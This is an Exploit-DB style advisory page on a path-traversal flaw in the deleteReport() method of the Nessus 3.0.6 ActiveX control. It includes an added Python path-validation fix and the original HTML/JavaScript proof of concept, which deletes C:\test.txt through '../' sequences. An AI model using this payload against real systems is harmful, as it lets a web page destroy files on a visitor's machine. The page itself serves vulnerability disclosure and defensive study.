Vendor: Nessus Vulnerability Scanner
By: Krystian Kloskowski (h07)
CVSS: 7.5 (HIGH)
Title: ActiveX Remote Delete File Exploit
CWE: 20
Product Name: Nessus Vulnerability Scanner
Affected Version From: Nessus 3.0.6
Affected Version To: Nessus 3.0.6
Patch Exists: NO
Platforms Tested: Internet Explorer 6 on Windows XP SP2 (Polish)
Year: 2007

Nessus Vulnerability Scanner 3.0.6 ActiveX deleteReport() 0day Remote Delete File Exploit

This exploit targets the deleteReport() method of the Nessus Vulnerability Scanner 3.0.6 ActiveX control. By passing a relative path containing ../ traversal sequences to deleteReport(), an attacker can delete arbitrary files on the system. The exploit was discovered by Krystian Kloskowski (h07) and has been tested on Nessus 3.0.6 running on Internet Explorer 6 on Windows XP SP2 (Polish). This exploit is provided for demonstration purposes only.

Mitigation:

The vendor should release a patch to fix this vulnerability.
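
The class of fix this calls for is a containment check on the path before any file operation. The following is an added example, not Nessus code and not part of the original advisory: it resolves a caller-supplied report name with Windows path semantics and rejects anything that lands outside the report directory. The directory `C:\Reports`, the function name and the sample file names are assumptions made for illustration.

```python
import ntpath  # Windows path rules, usable on any OS

# Hypothetical report directory; the page does not say where the control
# stores its reports.
REPORT_DIR = r"C:\Reports"


def resolve_report_path(name, base=REPORT_DIR):
    """Return the absolute path of report `name` inside `base`, else None."""
    if not name or "\x00" in name:
        return None
    # Refuse drive letters, drive-relative names (C:foo), stream syntax,
    # UNC paths and rooted paths before doing any joining.
    drive, _ = ntpath.splitdrive(name)
    if drive or ":" in name or name[0] in "\\/":
        return None
    # normpath treats "/" and "\" alike and collapses every ".." segment,
    # so the comparison below sees the path the file system would see.
    base_norm = ntpath.normpath(base)
    candidate = ntpath.normpath(ntpath.join(base_norm, name))
    base_key = ntpath.normcase(base_norm)
    cand_key = ntpath.normcase(candidate)
    try:
        # Component-wise comparison: C:\Reports2 does not count as being
        # inside C:\Reports, which a plain startswith() would get wrong.
        inside = ntpath.commonpath([base_key, cand_key]) == base_key
    except ValueError:  # different drives, or absolute mixed with relative
        return None
    if not inside or cand_key == base_key:
        return None
    # Lexical check only: a real implementation must also make sure no
    # junction or symlink under `base` points elsewhere.
    return candidate


if __name__ == "__main__":
    # Constructed inputs; the first is the string used by the PoC on this page.
    for sample in ["../../../../../../../test.txt", "..\\Reports2\\x.txt",
                   "C:\\test.txt", "weekly.txt", "sub/../weekly.txt"]:
        print(f"{sample!r:40} -> {resolve_report_path(sample)}")
```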
Source

Exploit-DB raw data:

<HTML>
<!--
Nessus Vulnerability Scanner 3.0.6 ActiveX deleteReport() 0day Remote Delete File Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
Just for fun ;]
-->

<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>

<script language="javascript">
obj.deleteReport("../../../../../../../test.txt"); //Deleting file: C:\test.txt
alert("done");
</script>
</HTML>

# milw0rm.com [2007-07-26]